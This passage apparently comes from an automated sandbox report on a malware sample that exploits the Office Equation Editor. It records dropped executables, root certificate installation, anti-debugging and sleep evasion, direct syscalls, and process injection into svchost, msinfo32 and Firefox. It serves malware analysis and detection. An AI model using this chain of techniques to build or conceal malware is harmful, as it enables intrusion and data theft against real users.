Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\word.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_004772DE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_004375B0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004440785_2_00444078
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-174
Source: C:\Users\user\AppData\Roaming\word.exeAPI/Special instruction interceptor: Address: 35153F4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B00101 rdtsc 6_2_00B00101
Source: C:\Windows\SysWOW64\msinfo32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\word.exeAPI coverage: 3.4 %
Source: C:\Windows\SysWOW64\msinfo32.exeAPI coverage: 2.2 %
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3676Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3952Thread sleep count: 43 > 30Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 3952Thread sleep time: -86000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exe TID: 4028Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msinfo32.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452126
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,5_2_0045C999
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,5_2_00436ADE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00434BEE
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,5_2_00436D2D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442E1F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045DD7C FindFirstFileW,FindClose,5_2_0045DD7C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD29
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00475FE5
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8D
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_0040E470
Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00B00101 rdtsc 6_2_00B00101
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AB07AC NtCreateMutant,LdrInitializeThunk,6_2_00AB07AC
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0045A259 BlockInput,5_2_0045A259
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D6D0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040EB70 LoadLibraryA,GetProcAddress,5_2_0040EB70
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036AE64C mov edx, dword ptr fs:[00000030h]2_2_036AE64C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_03514050 mov eax, dword ptr fs:[00000030h]5_2_03514050
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_03515660 mov eax, dword ptr fs:[00000030h]5_2_03515660
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_035156C0 mov eax, dword ptr fs:[00000030h]5_2_035156C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AA0080 mov ecx, dword ptr fs:[00000030h]6_2_00AA0080
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AA00EA mov eax, dword ptr fs:[00000030h]6_2_00AA00EA
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00AC26F8 mov eax, dword ptr fs:[00000030h]6_2_00AC26F8
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_00426DA1
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0042202E SetUnhandledExceptionFilter,5_2_0042202E
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004230F5
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00417D93
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00421FA7

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtSetInformationThread: Direct from: 0x774CFF12Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeSection loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeThread APC queued: target process: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeJump to behavior
